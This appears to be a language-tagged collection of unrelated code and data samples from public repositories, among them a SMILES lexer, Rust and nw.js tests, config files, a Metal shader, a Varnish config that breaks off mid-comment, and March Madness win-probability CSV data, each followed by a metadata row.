yylval.bond->setBondDir(Bond::ENDUPRIGHT);
return BOND; }
\( { return GROUP_OPEN; }
\) { return GROUP_CLOSE; }
\[ { BEGIN IN_ATOM_STATE; return ATOM_OPEN; }
<IN_ATOM_STATE>\] { BEGIN INITIAL; return ATOM_CLOSE; }
\. { return SEPARATOR; }
\_ { return DATIVE_MARK; }
\% { return PERCENT; }
[0-9] { yylval.ival = atoi( yytext ); return DIGIT; }
\n return 0;
. return yytext[0];
%%
int yywrap( void ) { return 1; }
| JFlex | 3 | kazuyaujihara/rdkit | Code/GraphMol/SmilesParse/esmiles.flex | [
"BSD-3-Clause"
] |
fn main() {
((((((((((((((((((((((((((((((((((((((((((0) + 1) + 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1)
+ 1);
}
| Rust | 0 | mbc-git/rust | src/tools/rustfmt/tests/target/issue-3465.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
Started keeping the ``Authorization`` header during HTTP -> HTTPS redirects when the host remains the same.
| Cucumber | 1 | loven-doo/aiohttp | CHANGES/5783.feature | [
"Apache-2.0"
] |
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>issue-4157</title>
</head>
<body>
<a href="next.html">To Next Page</a>
<button onclick="getCurrentWindow()">nw.Window.get()</button>
<script>
function out(id, msg) {
var h1 = document.createElement('h1');
h1.setAttribute('id', id);
h1.innerHTML = msg;
document.body.appendChild(h1);
}
function getCurrentWindow() {
try{
var r = nw.Window.get();
if (r.cWindow || r.appWindow) {
out('result', 'success');
} else {
out('result', 'failure');
}
} catch (e) {
out('result', 'failure');
}
}
</script></body>
</html>
| HTML | 4 | frank-dspeed/nw.js | test/sanity/issue4157-nav-win-lost/index.html | [
"MIT"
] |
<figure
class="mini_player js-mini-player"
data-title="<%= @title %>"
data-audio="<%= @audio %>"
data-duration="<%= @duration %>"
>
<a href="<%= @audio %>" class="mini_player-button mini_player-button--play js-player-play-button"></a>
<form class="mini_player-slider">
<div class="range_slider">
<div class="range_slider-range_wrap">
<input class="range_slider-range js-player-scrubber" type="range" value="0" min="0" max="<%= @duration %>"/>
<div class="range_slider-range-track js-player-track"></div>
</div>
</div>
</form>
<output class="mini_player-time"><span class="js-player-current">0:00</span> / <span class="js-player-duration"><%= TimeView.duration(@duration) %></span></output>
</figure>
| HTML+EEX | 3 | PsOverflow/changelog.com | lib/changelog_web/templates/shared/_mini_player.html.eex | [
"MIT"
] |
xuces-bapyb-vikob-zesyv-budod-nupip-kebon-tacyc-fofed-lezic-soxax
| BitBake | 3 | chrisburr/gct | gsi_openssh/source/regress/unittests/sshkey/testdata/ed25519_2.fp.bb | [
"Apache-2.0"
] |
<?xml version="1.0" encoding="UTF-8"?>
<!-- ******************************************************************* -->
<!-- -->
<!-- Copyright IBM Corp. 2010, 2014 -->
<!-- -->
<!-- Licensed under the Apache License, Version 2.0 (the "License"); -->
<!-- you may not use this file except in compliance with the License. -->
<!-- You may obtain a copy of the License at: -->
<!-- -->
<!-- http://www.apache.org/licenses/LICENSE-2.0 -->
<!-- -->
<!-- Unless required by applicable law or agreed to in writing, software -->
<!-- distributed under the License is distributed on an "AS IS" BASIS, -->
<!-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or -->
<!-- implied. See the License for the specific language governing -->
<!-- permissions and limitations under the License. -->
<!-- -->
<!-- ******************************************************************* -->
<!-- DO NOT EDIT. THIS FILE IS GENERATED. -->
<faces-config>
<faces-config-extension>
<namespace-uri>http://www.ibm.com/xsp/coreex</namespace-uri>
<default-prefix>xe</default-prefix>
<designer-extension>
<control-subpackage-name>tagcloud</control-subpackage-name>
</designer-extension>
</faces-config-extension>
<complex-type>
<description>%complex-type.dominoViewCloudData.descr%</description>
<display-name>%complex-type.dominoViewCloudData.name%</display-name>
<complex-id>com.ibm.xsp.extlib.component.tagcloud.ViewTagCloudData</complex-id>
<complex-class>com.ibm.xsp.extlib.component.tagcloud.ViewTagCloudData</complex-class>
<property>
<description>%property.viewName.descr%</description>
<display-name>%property.viewName.name%</display-name>
<property-name>viewName</property-name>
<property-class>string</property-class>
<property-extension>
<designer-extension>
<editor>com.ibm.xsp.extlib.designer.tooling.editor.ViewNameEditor</editor>
</designer-extension>
<required>true</required>
</property-extension>
</property>
<property>
<description>%property.categoryColumn.descr%</description>
<display-name>%property.categoryColumn.name%</display-name>
<property-name>categoryColumn</property-name>
<property-class>int</property-class>
</property>
<property>
<description>%property.sortTags.descr%</description>
<display-name>%property.sortTags.name%</display-name>
<property-name>sortTags</property-name>
<property-class>string</property-class>
<property-extension>
<designer-extension>
<editor>com.ibm.workplace.designer.property.editors.comboParameterEditor</editor>
<editor-parameter>
alphabet
weight
</editor-parameter>
</designer-extension>
<required>false</required>
</property-extension>
</property>
<property>
<description>%property.maxTagLimit.descr%</description>
<display-name>%property.maxTagLimit.name%</display-name>
<property-name>maxTagLimit</property-name>
<property-class>int</property-class>
</property>
<property>
<description>%property.tagThreshold.descr%</description>
<display-name>%property.tagThreshold.name%</display-name>
<property-name>tagThreshold</property-name>
<property-class>int</property-class>
</property>
<property>
<description>%property.minEntryCount.descr%</description>
<display-name>%property.minEntryCount.name%</display-name>
<property-name>minEntryCount</property-name>
<property-class>int</property-class>
</property>
<property>
<description>%property.cacheMode.descr%</description>
<display-name>%property.cacheMode.name%</display-name>
<property-name>cacheMode</property-name>
<property-class>string</property-class>
<property-extension>
<designer-extension>
<editor>com.ibm.workplace.designer.property.editors.comboParameterEditor</editor>
<editor-parameter>
off
auto
manual
</editor-parameter>
</designer-extension>
</property-extension>
</property>
<property>
<description>%property.cacheRefreshInterval.descr%</description>
<display-name>%property.cacheRefreshInterval.name%</display-name>
<property-name>cacheRefreshInterval</property-name>
<property-class>int</property-class>
</property>
<property>
<description>%property.linkTargetPage.descr%</description>
<display-name>%property.linkTargetPage.name%</display-name>
<property-name>linkTargetPage</property-name>
<property-class>string</property-class>
<property-extension>
<designer-extension>
<editor>com.ibm.workplace.designer.property.editors.PagePicker</editor>
</designer-extension>
<required>false</required>
</property-extension>
</property>
<property>
<description>%property.linkRequestParam.descr%</description>
<display-name>%property.linkRequestParam.name%</display-name>
<property-name>linkRequestParam</property-name>
<property-class>string</property-class>
</property>
<property>
<description>%property.linkMetaSeparator.descr%</description>
<display-name>%property.linkMetaSeparator.name%</display-name>
<property-name>linkMetaSeparator</property-name>
<property-class>string</property-class>
<property-extension>
<designer-extension>
<tags>todo</tags>
</designer-extension>
</property-extension>
</property>
<complex-extension>
<base-complex-id>com.ibm.xsp.extlib.component.tagcloud.ITagCloudData</base-complex-id>
<tag-name>dominoViewCloudData</tag-name>
</complex-extension>
</complex-type>
</faces-config>
| XPages | 3 | jesse-gallagher/XPagesExtensionLibrary | extlib/lwp/product/runtime/eclipse/plugins/com.ibm.xsp.extlib.domino/src/com/ibm/xsp/extlib/config/extlib-domino-tagcloud.xsp-config | [
"Apache-2.0"
] |
SynthDef("klang", {
var nPartials = 12, nChans = 5;
var n = nPartials * nChans;
Splay.ar(Klang.ar(`[ { { rrand(200.0, 2000.0) } ! nPartials } ! nChans, nil, nil ], 1, 0))
* EnvGen.kr(Env.sine(4), 1, 0.02, doneAction: Done.freeSelf);
}); | SuperCollider | 3 | woolgathering/supercolliderjs | examples/klang.scd | [
"MIT"
] |
###############################################################################
## jq helper functions for DeepDive Code Compiler
###############################################################################
def merge(objects): reduce objects as $es ({}; . + $es);
def trimWhitespace: gsub("^\\s+|\\s+$"; ""; "m");
def nullOr(expr): if type == "null" then null else expr end;
| JSONiq | 4 | onthway/deepdive | compiler/compile-config/util.jq | [
"Apache-2.0"
] |
/* Font sets */
@gothic_book: "Franklin Gothic FS Book","DejaVu Sans Book";
@gothic_med: "Franklin Gothic FS Medium","DejaVu Sans Book";
/* ---- COUNTRIES ---- */
#country-label[zoom>1][zoom<10]{
text-face-name: @gothic_book;
text-fill:rgba(0,0,0,0.5);
text-size:9;
text-transform:uppercase;
text-halo-fill:rgba(255,255,255,0.5);
text-halo-radius:1;
text-character-spacing:1;
text-line-spacing:1;
text-wrap-width:20;
text-name:"''";
[zoom=3] {
text-size:9;
}
[zoom=4] {
text-size:11;
}
[zoom=5] {
text-size:12;
text-character-spacing:1;
text-line-spacing:1;
}
[zoom=6] {
text-size:14;
text-character-spacing:2;
text-line-spacing:2;
}
[zoom>6][zoom<10] {
text-size:16;
text-character-spacing:2;
text-line-spacing:4;
}
[zoom>=2][Z_ABBREV = 2],
[zoom>=3][Z_ABBREV = 3],
[zoom>=4][Z_ABBREV = 4],
[zoom>=5][Z_ABBREV = 5],
[zoom>=6][Z_ABBREV = 6] { text-name: "[ABBREV]"; }
[zoom>=2][Z_NAME = 2],
[zoom>=3][Z_NAME = 3],
[zoom>=4][Z_NAME = 4],
[zoom>=5][Z_NAME = 5],
[zoom>=6][Z_NAME = 6] { text-name: "[NAME]"; }
[zoom>=2][Z_ADMIN = 2],
[zoom>=3][Z_ADMIN = 3],
[zoom>=4][Z_ADMIN = 4],
[zoom>=5][Z_ADMIN = 5],
[zoom>=6][Z_ADMIN = 6] { text-name: "[ADMIN]"; }
}
/* ---- CITIES ---- */
#city {
[SCALERANK<3][zoom>=4],
[SCALERANK=3][zoom>=5],
[SCALERANK=4][zoom>=5],
[SCALERANK=5][zoom>=6],
[SCALERANK=6][zoom>=6],
[SCALERANK=7][zoom>=7],
[SCALERANK=8][zoom>=7],
[SCALERANK=9][zoom>=8],
[SCALERANK=10][zoom>=8] {
text-name: "[NAMEASCII]";
text-face-name: @gothic_med;
text-size: 10;
text-fill: rgba(0,0,0,0.6);
text-halo-radius: 1;
text-halo-fill: rgba(255,255,255,0.4);
}
[zoom=4] {
[SCALERANK<3] { text-size: 12; }
}
[zoom=5] {
[SCALERANK<3] { text-size: 13; }
[SCALERANK=3] { text-size: 12; }
[SCALERANK=4] { text-size: 11; }
}
[zoom=6] {
[SCALERANK<3] { text-size: 14; }
[SCALERANK=3] { text-size: 13; }
[SCALERANK=4] { text-size: 12; }
[SCALERANK=5] { text-size: 11; }
}
[zoom=7] {
[SCALERANK<3] { text-size: 15; }
[SCALERANK=3] { text-size: 14; }
[SCALERANK=4] { text-size: 13; }
[SCALERANK=5] { text-size: 12; }
[SCALERANK=6] { text-size: 11; }
[SCALERANK=7] { text-size: 11; }
}
[zoom=8] {
[SCALERANK<3] { text-size: 15; }
[SCALERANK=3] { text-size: 15; }
[SCALERANK=4] { text-size: 14; }
[SCALERANK=5] { text-size: 14; }
[SCALERANK=6] { text-size: 13; }
[SCALERANK=7] { text-size: 13; }
[SCALERANK=8] { text-size: 12; }
[SCALERANK=9] { text-size: 11; }
}
[zoom=9] {
[SCALERANK<3] { text-size: 16; }
[SCALERANK=3] { text-size: 16; }
[SCALERANK=4] { text-size: 15; }
[SCALERANK=5] { text-size: 15; }
[SCALERANK=6] { text-size: 14; }
[SCALERANK=7] { text-size: 14; }
[SCALERANK=8] { text-size: 13; }
[SCALERANK=9] { text-size: 13; }
[SCALERANK=10] { text-size: 12; }
}
[zoom=10] {
[SCALERANK<3] { text-size: 16; text-character-spacing:2; }
[SCALERANK=3] { text-size: 16; text-character-spacing:2; }
[SCALERANK=4] { text-size: 15; text-character-spacing:1; }
[SCALERANK=5] { text-size: 15; text-character-spacing:1; }
[SCALERANK=6] { text-size: 15; text-character-spacing:1; }
[SCALERANK=7] { text-size: 14; }
[SCALERANK=8] { text-size: 14; }
[SCALERANK=9] { text-size: 13; }
[SCALERANK=10] { text-size: 13; }
}
[zoom>10] {
[SCALERANK<3] { text-size: 16; text-character-spacing:3; }
[SCALERANK=3] { text-size: 16; text-character-spacing:3; }
[SCALERANK=4] { text-size: 16; text-character-spacing:3; }
[SCALERANK=5] { text-size: 15; text-character-spacing:2; }
[SCALERANK=6] { text-size: 15; text-character-spacing:2; }
[SCALERANK=7] { text-size: 15; text-character-spacing:2; }
[SCALERANK=8] { text-size: 14; text-character-spacing:1; }
[SCALERANK=9] { text-size: 14; text-character-spacing:1; }
[SCALERANK=10] { text-size: 14; text-character-spacing:1; }
}
}
| CartoCSS | 4 | nimix/carto | test/rendering/fontset-duplication.mss | [
"Apache-2.0"
] |
### /role/create 成功
POST {{baseUrl}}/system/role/create
Authorization: Bearer {{token}}
Content-Type: application/json
{
"name": "测试角色",
"code": "test",
"sort": 0
}
### /role/update 成功
POST {{baseUrl}}/system/role/update
Authorization: Bearer {{token}}
Content-Type: application/json
{
"id": 100,
"name": "测试角色",
"code": "test",
"sort": 10
}
### /resource/delete 成功
POST {{baseUrl}}/system/role/delete
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer {{token}}
roleId=14
### /role/get 成功
GET {{baseUrl}}/system/role/get?id=100
Content-Type: application/x-www-form-urlencoded
Authorization: Bearer {{token}}
### /role/page 成功
GET {{baseUrl}}/system/role/page?pageNo=1&pageSize=10
Authorization: Bearer {{token}}
###
| HTTP | 3 | cksspk/ruoyi-vue-pro | yudao-admin-server/src/main/java/cn/iocoder/yudao/adminserver/modules/system/controller/permission/SysRoleController.http | [
"MIT"
] |
sleep 1
t cal -de 6
| AGS Script | 1 | waltersgrey/autoexechack | Video-Effects/70sFilm/Hero3Black/autoexec.ash | [
"MIT"
] |
#!/bin/sh
if [ "$username" = "good-user" ] && [ "$password" = "good-pass" ]; then
echo "Auth should succeed." >&2
if [ "$1" = "--with-meta" ]; then
echo "name=Bob"
fi
exit 0
fi
echo "Auth should fail." >&2
exit 1
| Shell | 3 | domwillcode/home-assistant | tests/auth/providers/test_command_line_cmd.sh | [
"Apache-2.0"
] |
/*
This equation is a simplification of the general blending equation. It assumes the destination color is opaque, and therefore drops the destination color's alpha term.
D = C1 * C1a + C2 * C2a * (1 - C1a)
where D is the resultant color, C1 is the color of the first element, C1a is the alpha of the first element, C2 is the second element color, C2a is the alpha of the second element. The destination alpha is calculated with:
Da = C1a + C2a * (1 - C1a)
The resultant color is premultiplied with the alpha. To restore the color to the unmultiplied values, just divide by Da, the resultant alpha.
http://stackoverflow.com/questions/1724946/blend-mode-on-a-transparent-and-semi-transparent-background
For some reason Photoshop behaves
D = C1 + C2 * C2a * (1 - C1a)
*/
#include <metal_stdlib>
#include "OperationShaderTypes.h"
using namespace metal;
fragment half4 normalBlendFragment(TwoInputVertexIO fragmentInput [[stage_in]],
texture2d<half> inputTexture [[texture(0)]],
texture2d<half> inputTexture2 [[texture(1)]])
{
constexpr sampler quadSampler;
half4 textureColor = inputTexture.sample(quadSampler, fragmentInput.textureCoordinate);
constexpr sampler quadSampler2;
half4 textureColor2 = inputTexture2.sample(quadSampler2, fragmentInput.textureCoordinate2);
half4 outputColor;
half a = textureColor.a + textureColor2.a * (1.0h - textureColor.a);
half alphaDivisor = a + step(a, 0.0h); // Protect against a divide-by-zero blacking out things in the output
outputColor.r = (textureColor.r * textureColor.a + textureColor2.r * textureColor2.a * (1.0h - textureColor.a))/alphaDivisor;
outputColor.g = (textureColor.g * textureColor.a + textureColor2.g * textureColor2.a * (1.0h - textureColor.a))/alphaDivisor;
outputColor.b = (textureColor.b * textureColor.a + textureColor2.b * textureColor2.a * (1.0h - textureColor.a))/alphaDivisor;
outputColor.a = a;
return outputColor;
}
| Metal | 5 | luoxiao/GPUImage3 | framework/Source/Operations/NormalBlend.metal | [
"BSD-3-Clause"
] |
team_id,team_name,team_seed,team_region,playin_flag,team_alive,rd1_win,rd2_win,rd3_win,rd4_win,rd5_win,rd6_win,rd7_win,win_odds,timestamp
57,Florida,1,South,0,1,1.000000000000,0.987703989038,0.776346390631,0.578629807537,0.386134712302,0.245646203422,0.135015292620,6.406568401,3/20/2014 4:59 PM
399,Albany,16a,South,1,1,1.000000000000,0.012296010962,0.001265961952,0.000178778889,0.000021644324,0.000002691511,0.000000272393,3671168.177,3/20/2014 4:59 PM
116,Mount St. Mary's,16b,South,1,0,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
38,Colorado,8,South,0,0,1.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
221,Pittsburgh,9,South,0,1,1.000000000000,1.000000000000,0.222387647417,0.126060402356,0.062100245272,0.028977653607,0.011380020177,86.87330641,3/20/2014 4:59 PM
2670,Virginia Commonwealth,5,South,0,1,1.000000000000,0.764132213407,0.286663248967,0.095274225263,0.045630101139,0.020734024563,0.007847102156,126.4355781,3/20/2014 4:59 PM
2617,Stephen F. Austin,12,South,0,1,1.000000000000,0.235867786593,0.041831022382,0.006101831137,0.001605649600,0.000473970012,0.000114387928,8741.181256,3/20/2014 4:59 PM
26,UCLA,4,South,0,1,1.000000000000,0.870759407024,0.626921550372,0.186675748040,0.082356503346,0.037835530427,0.014453526907,68.18726526,3/20/2014 4:59 PM
202,Tulsa,13,South,0,1,1.000000000000,0.129240592976,0.044584178278,0.007079206777,0.001984665131,0.000601612613,0.000149236175,6699.788204,3/20/2014 4:59 PM
194,Ohio State,6,South,0,0,1.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
2168,Dayton,11,South,0,1,1.000000000000,1.000000000000,0.226612132452,0.065837250065,0.016035704967,0.004704483522,0.001121096415,890.9839421,3/20/2014 4:59 PM
183,Syracuse,3,South,0,1,1.000000000000,1.000000000000,0.773387867548,0.361804119368,0.145738920816,0.067669406460,0.026221485256,37.13666504,3/20/2014 4:59 PM
2711,Western Michigan,14,South,0,0,1.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
167,New Mexico,7,South,0,1,1.000000000000,0.637537835827,0.221612021956,0.103072200741,0.034116276040,0.014974348815,0.005463271388,182.0405135,3/20/2014 4:59 PM
24,Stanford,10,South,0,1,1.000000000000,0.362462164173,0.089184577130,0.031329004330,0.007502498101,0.002487546758,0.000675102898,1480.255677,3/20/2014 4:59 PM
2305,Kansas,2,South,0,1,1.000000000000,0.924028935551,0.670385180717,0.434274653551,0.216308758537,0.126634377369,0.063313875565,14.79432614,3/20/2014 4:59 PM
2198,Eastern Kentucky,15,South,0,1,1.000000000000,0.075971064449,0.018818220196,0.003682771944,0.000464320426,0.000075584853,0.000009904904,100959.092,3/20/2014 4:59 PM
258,Virginia,1,East,0,1,1.000000000000,0.963891640710,0.707824942042,0.391475266230,0.234126633858,0.122316057108,0.060103098444,15.63807734,3/20/2014 4:59 PM
324,Coastal Carolina,16,East,0,1,1.000000000000,0.036108359290,0.005669669617,0.000428540662,0.000042971522,0.000003250237,0.000000252411,3961790.008,3/20/2014 4:59 PM
235,Memphis,8,East,0,1,1.000000000000,0.550041201202,0.166598236998,0.059943419934,0.024549631377,0.008507951965,0.002795299199,356.7434574,3/20/2014 4:59 PM
45,George Washington,9,East,0,1,1.000000000000,0.449958798798,0.119907151343,0.036518391621,0.012892921530,0.003384588169,0.000849129389,1176.676821,3/20/2014 4:59 PM
2132,Cincinnati,5,East,0,0,1.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
108,Harvard,12,East,0,1,1.000000000000,1.000000000000,0.268198919318,0.095317821149,0.037557219408,0.010360971725,0.002719361769,366.7333452,3/20/2014 4:59 PM
127,Michigan State,4,East,0,1,1.000000000000,0.911785444648,0.704154711967,0.410880401116,0.252691454175,0.128471105500,0.061392520515,15.28862916,3/20/2014 4:59 PM
48,Delaware,13,East,0,1,1.000000000000,0.088214555352,0.027646368715,0.005436159288,0.001258555788,0.000206411381,0.000033160960,30154.94244,3/20/2014 4:59 PM
153,North Carolina,6,East,0,1,1.000000000000,0.679637367771,0.363762160822,0.158570533817,0.063939586008,0.023705545760,0.008294622424,119.5600387,3/20/2014 4:59 PM
2507,Providence,11,East,0,1,1.000000000000,0.320362632229,0.121140229004,0.038846850512,0.011589652048,0.002892157946,0.000691127241,1445.911568,3/20/2014 4:59 PM
66,Iowa State,3,East,0,1,1.000000000000,0.812359445117,0.463801514016,0.203333849998,0.082372878337,0.032471622928,0.012060023486,81.91857816,3/20/2014 4:59 PM
2428,North Carolina Central,14,East,0,1,1.000000000000,0.187640554883,0.051296096158,0.010147441688,0.001896667672,0.000333949129,0.000057356013,17433.96364,3/20/2014 4:59 PM
41,Connecticut,7,East,0,1,1.000000000000,0.673010096346,0.263145195971,0.141404339929,0.057755863090,0.020059608440,0.006582562695,150.9165174,3/20/2014 4:59 PM
2603,Saint Joseph's,10,East,0,1,1.000000000000,0.326989903654,0.083539258184,0.032306717406,0.009020180692,0.002146666571,0.000490310083,2038.52567,3/20/2014 4:59 PM
222,Villanova,2,East,0,1,1.000000000000,0.947195368265,0.644579937677,0.413875184448,0.210128054172,0.094302132060,0.039730491796,24.16958524,3/20/2014 4:59 PM
270,Milwaukee,15,East,0,1,1.000000000000,0.052804631735,0.008735608167,0.001515082202,0.000177730323,0.000020547151,0.000002378332,420461.6726,3/20/2014 4:59 PM
2724,Wichita State,1,Midwest,0,1,1.000000000000,0.975453920569,0.591415204901,0.243995103509,0.135567504661,0.076996573574,0.044061761894,21.69541564,3/20/2014 4:59 PM
13,Cal Poly,16a,Midwest,1,1,1.000000000000,0.024546079431,0.001766218646,0.000082320812,0.000006772233,0.000000709437,0.000000088396,11312752.66,3/20/2014 4:59 PM
2640,Texas Southern,16b,Midwest,1,0,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
96,Kentucky,8,Midwest,0,1,1.000000000000,0.739316299302,0.340260219827,0.142251946886,0.080003446948,0.038257663284,0.018646613679,52.62904049,3/20/2014 4:59 PM
2306,Kansas State,9,Midwest,0,1,1.000000000000,0.260683700698,0.066558356626,0.013983112422,0.004485466884,0.001495593305,0.000525504126,1901.934632,3/20/2014 4:59 PM
139,Saint Louis,5,Midwest,0,1,1.000000000000,0.580465059354,0.120455730503,0.041538407325,0.016290497164,0.005773543200,0.002136978613,466.9504015,3/20/2014 4:59 PM
152,North Carolina State,12a,Midwest,1,1,1.000000000000,0.419534940646,0.069633049968,0.016972267703,0.004991897941,0.001328955804,0.000383210851,2608.529448,3/20/2014 4:59 PM
2752,Xavier,12b,Midwest,1,0,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
97,Louisville,4,Midwest,0,1,1.000000000000,0.930702991238,0.784236991916,0.536532508704,0.380555562235,0.234950042298,0.145286935098,5.882931348,3/20/2014 4:59 PM
2363,Manhattan,13,Midwest,0,1,1.000000000000,0.069297008762,0.025674227612,0.004644332639,0.001050245642,0.000212058544,0.000047170171,21198.83842,3/20/2014 4:59 PM
113,Massachusetts,6,Midwest,0,1,1.000000000000,0.294573469275,0.056982985793,0.019293553806,0.003793495077,0.001003788646,0.000284934272,3508.581329,3/20/2014 4:59 PM
2294,Iowa,11a,Midwest,1,0,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
2633,Tennessee,11b,Midwest,1,1,1.000000000000,0.705426530725,0.241660203984,0.127464151068,0.044429275940,0.018887339872,0.008298591884,119.5023712,3/20/2014 4:59 PM
150,Duke,3,Midwest,0,1,1.000000000000,0.929166050148,0.683485418794,0.415466593704,0.174612580298,0.086660791752,0.043609498391,21.93078428,3/20/2014 4:59 PM
2382,Mercer,14,Midwest,0,1,1.000000000000,0.070833949852,0.017871391430,0.004078648252,0.000497780982,0.000094962651,0.000020087411,49781.4245,3/20/2014 4:59 PM
251,Texas,7,Midwest,0,1,1.000000000000,0.501186611909,0.125981179688,0.032428092314,0.006045779365,0.002144409947,0.000796866765,1253.914929,3/20/2014 4:59 PM
9,Arizona State,10,Midwest,0,1,1.000000000000,0.498813388091,0.124986380124,0.031258370301,0.005651957948,0.001756841606,0.000577916702,1729.353173,3/20/2014 4:59 PM
130,Michigan,2,Midwest,0,1,1.000000000000,0.953947339272,0.738941443532,0.369116101447,0.141961792951,0.061537476099,0.027272737526,35.66665288,3/20/2014 4:59 PM
2747,Wofford,15,Midwest,0,1,1.000000000000,0.046052660728,0.010090996657,0.000894489108,0.000055943729,0.000005699304,0.000000683254,1463583.003,3/20/2014 4:59 PM
12,Arizona,1,West,0,1,1.000000000000,0.977695239703,0.726876539487,0.582110140089,0.403359117954,0.219691419709,0.127582578376,6.83806075,3/20/2014 4:59 PM
2692,Weber State,16,West,0,1,1.000000000000,0.022304760297,0.002656332371,0.000568048682,0.000079819610,0.000007170329,0.000000889213,1124588.336,3/20/2014 4:59 PM
2250,Gonzaga,8,West,0,1,1.000000000000,0.479870068532,0.126191039747,0.077161928178,0.037293642896,0.013091191217,0.005211004447,190.9015825,3/20/2014 4:59 PM
197,Oklahoma State,9,West,0,1,1.000000000000,0.520129931468,0.144276088395,0.089695661144,0.044273481634,0.020539413436,0.010426470781,94.90973025,3/20/2014 4:59 PM
201,Oklahoma,5,West,0,1,1.000000000000,0.637908924452,0.334150742066,0.076682364608,0.028575181328,0.010317149331,0.004210408461,236.5066479,3/20/2014 4:59 PM
2449,North Dakota State,12,West,0,1,1.000000000000,0.362091075548,0.145878994274,0.019494647020,0.004841171468,0.000959860645,0.000233806407,4276.042755,3/20/2014 4:59 PM
21,San Diego State,4,West,0,1,1.000000000000,0.745488809005,0.431128698952,0.142917343287,0.069711793080,0.019654217231,0.006441075921,154.2535651,3/20/2014 4:59 PM
166,New Mexico State,13,West,0,1,1.000000000000,0.254511190995,0.088841564707,0.011369866993,0.002736696551,0.000496996173,0.000112430157,8893.410802,3/20/2014 4:59 PM
239,Baylor,6,West,0,1,1.000000000000,0.703236756559,0.338102692122,0.120962317499,0.037460840011,0.015174633065,0.006840671752,145.1844737,3/20/2014 4:59 PM
158,Nebraska,11,West,0,1,1.000000000000,0.296763243441,0.091637776657,0.023693628575,0.005394685537,0.001391066557,0.000425856722,2347.20762,3/20/2014 4:59 PM
156,Creighton,3,West,0,1,1.000000000000,0.883050561066,0.543847562200,0.259692043559,0.107111004100,0.047520330211,0.023119058765,42.25435608,3/20/2014 4:59 PM
309,Louisiana-Lafayette,14,West,0,1,1.000000000000,0.116949438934,0.026411969021,0.003147727955,0.000351303895,0.000053715294,0.000010530266,94963.36368,3/20/2014 4:59 PM
2483,Oregon,7,West,0,1,1.000000000000,0.647316513476,0.135928309762,0.070819105788,0.025905611075,0.008118268376,0.002928305216,340.4944571,3/20/2014 4:59 PM
252,Brigham Young,10,West,0,1,1.000000000000,0.352683486524,0.044472874782,0.017358224716,0.004506016020,0.001040525474,0.000289503368,3453.19125,3/20/2014 4:59 PM
275,Wisconsin,2,West,0,1,1.000000000000,1.000000000000,0.819598815455,0.504326951908,0.228399634842,0.110837593629,0.058651561576,16.04984442,3/20/2014 4:59 PM
44,American University,15,West,0,0,1.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,0.000000000000,--,3/20/2014 4:59 PM
| CSV | 3 | h4ckfu/data | march-madness-predictions/bracket-10.csv | [
"CC-BY-4.0"
] |
Please report any system it works or doesn't work on in the wiki:
include
* the Metatrader build number,
* the origin of the metatrader exe,
* the Windows version and 32/64 bit, and
* the ZeroMq version, and
* the version of the Python pyzmq.
----
Parent: [[Home]]
| Creole | 1 | lionelyoung/OTMql4Zmq | wiki/TestedVersions.creole | [
"MIT"
] |
use std::rc::Rc;
struct Foo<'a> { //~ ERROR recursive type
bar: Bar<'a>,
b: Rc<Bar<'a>>,
}
struct Bar<'a> { //~ ERROR recursive type
y: (Foo<'a>, Foo<'a>),
z: Option<Bar<'a>>,
a: &'a Foo<'a>,
c: &'a [Bar<'a>],
d: [Bar<'a>; 1],
e: Foo<'a>,
x: Bar<'a>,
}
fn main() {}
| Rust | 3 | Eric-Arellano/rust | src/test/ui/span/recursive-type-field.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
/*
This is the minimal Varnish 3.x VCL configuration required for passing the
Apache mod_pagespeed system tests. To install varnish and start the varnish
server at the right port, do the following:
1) sudo apt-get install varnish
2) sudo vim /etc/default/varnish and put in the following lines at the
bottom of the file:
DAEMON_OPTS="-a :8020 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s file,/var/lib/varnish/$INSTANCE/varnish_storage.bin,1G"
3) sudo cp /path/to/install/sample_conf.vcl /etc/varnish/default.vcl
4) sudo service varnish restart
*/
import std;
# Block 1: Define upstream server's host and port.
backend default {
# Location of PageSpeed server.
.host = "127.0.0.1";
.port = "8080";
}
# Block 2: Define a key based on the User-Agent which can be used for hashing.
# Also set the PS-CapabilityList header for PageSpeed server to respect.
sub generate_user_agent_based_key {
# Define placeholder PS-CapabilityList header values for large and small
# screens with no UA dependent optimizations. Note that these placeholder
# values should not contain any of ll, ii, dj, jw or ws, since these
# codes will end up representing optimizations to be supported for the
# request.
set req.http.default_ps_capability_list_for_large_screens = "LargeScreen.SkipUADependentOptimizations:";
set req.http.default_ps_capability_list_for_small_screens = "TinyScreen.SkipUADependentOptimizations:";
# As a fallback, the PS-CapabilityList header that is sent to the upstream
# PageSpeed server should be for a large screen device with no browser
